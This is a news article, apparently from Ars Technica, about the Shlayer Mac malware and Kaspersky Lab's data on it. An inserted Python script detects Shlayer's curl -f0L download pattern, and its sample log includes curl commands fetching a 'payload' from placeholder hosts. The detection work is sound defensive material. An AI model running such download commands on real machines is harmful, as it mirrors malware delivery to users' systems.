Mac users are getting bombarded by laughably unsophisticated malware

(Image credit: Kaspersky Lab)

Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it’s the number one threat encountered by users of Kaspersky Lab’s antivirus programs for macOS.

Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by Kaspersky Lab’s Mac AV products. Attacks are most common against US users, who account for 31 percent of the attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) follow. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”
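The curl option combination quoted above is the kind of behavioural marker a defender can hunt for in process-execution telemetry. The script below is an added example, not code from Kaspersky Lab or from the Ars Technica article: it scans constructed process-exec records (a hypothetical "pid=… ppid=… exec=…" format, not any real EDR output) and flags curl invocations that use -f, -0 and -L together. It goes slightly beyond the literal -f0L string by also matching the same options when they are reordered, split into separate clusters, nested inside an "sh -c" string, or spelled as their long forms (--fail, --http1.0, --location). The three options are legitimate curl features, so a hit is a hunting lead to be read together with the parent process and the other behaviours described (downloading a file, executing it, deleting it), not a verdict on its own.

```python
"""Flag curl invocations that carry Shlayer's -f0L option set in process-exec records."""
import os
import re
import shlex

# Constructed sample of process-execution records in a hypothetical
# "<timestamp> pid=<n> ppid=<n> exec=<command line>" format, not real telemetry.
# Hosts under example.invalid are placeholders.
SAMPLE_LOG = """\
2020-01-23T10:14:02Z pid=4101 ppid=4099 exec=/usr/bin/curl -f0L https://example.invalid/payload -o /tmp/x
2020-01-23T10:14:05Z pid=4110 ppid=1 exec=/usr/bin/curl -sSL https://example.invalid/ok.txt
2020-01-23T10:14:09Z pid=4122 ppid=4099 exec=/bin/sh -c "curl -f -0 -L http://example.invalid/a > /tmp/b"
2020-01-23T10:14:11Z pid=4130 ppid=1 exec=/usr/bin/curl --fail --http1.0 --location https://example.invalid/c
2020-01-23T10:14:13Z pid=4131 ppid=1 exec=/usr/bin/curl -L0f https://example.invalid/d
"""

# curl's own spelling of the three options Shlayer chains together:
# -f/--fail, -0/--http1.0, -L/--location.
SHORT_TO_LONG = {"f": "fail", "0": "http1.0", "L": "location"}
CALLING_CARD = set(SHORT_TO_LONG.values())

# Short curl options that take an argument (a subset): anything glued onto the
# cluster after one of them is a value, not more flags.
ARG_SHORT = set("odHAXuebcmTwxKFUE")
SHELL_OPERATORS = {"|", "||", "&&", ";", ">", ">>", "<", "2>", "&"}

RECORD_RE = re.compile(r"pid=(?P<pid>\d+)\s+ppid=\d+\s+exec=(?P<exec>.*)$")


def flatten_tokens(cmdline):
    """Tokenise a command line and re-split quoted sub-commands (e.g. the
    argument to `sh -c`), so a curl nested inside a shell string is visible."""
    out = []
    for tok in shlex.split(cmdline):
        if re.search(r"\s", tok):
            out.extend(flatten_tokens(tok))
        else:
            out.append(tok)
    return out


def curl_options(args):
    """Return the set of option names in a curl argument list, with the three
    calling-card options normalised to their long names; stops at a shell
    operator so only this curl's own arguments are considered."""
    opts = set()
    for a in args:
        if a in SHELL_OPERATORS:
            break
        if a.startswith("--") and len(a) > 2:
            opts.add(a[2:].split("=", 1)[0])
        elif a.startswith("-") and len(a) > 1:
            for ch in a[1:]:
                opts.add(SHORT_TO_LONG.get(ch, ch))
                if ch in ARG_SHORT:
                    break
    return opts


def curl_invocations(cmdline):
    """Yield the argument list of every curl call found in a command line."""
    toks = flatten_tokens(cmdline)
    for i, tok in enumerate(toks):
        if os.path.basename(tok) == "curl":
            yield toks[i + 1:]


def has_calling_card(cmdline):
    """True if any curl in the command line uses -f, -0 and -L together."""
    return any(CALLING_CARD <= curl_options(args) for args in curl_invocations(cmdline))


def scan_log(text):
    """Return (pid, command line) for every record carrying the calling card."""
    hits = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if m and has_calling_card(m.group("exec")):
            hits.append((int(m.group("pid")), m.group("exec")))
    return hits


if __name__ == "__main__":
    for pid, cmd in scan_log(SAMPLE_LOG):
        print(f"pid {pid}: {cmd}")
```

Run against the embedded sample, the scan flags four of the five records and leaves the ordinary `curl -sSL` download alone. The option parser deliberately stops reading a short-option cluster after an argument-taking option such as `-o`, so a path like `-o/tmp/Launch` does not contribute a spurious `L`.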

https://arstechnica.com/?p=1648279

Source: Ars Technica
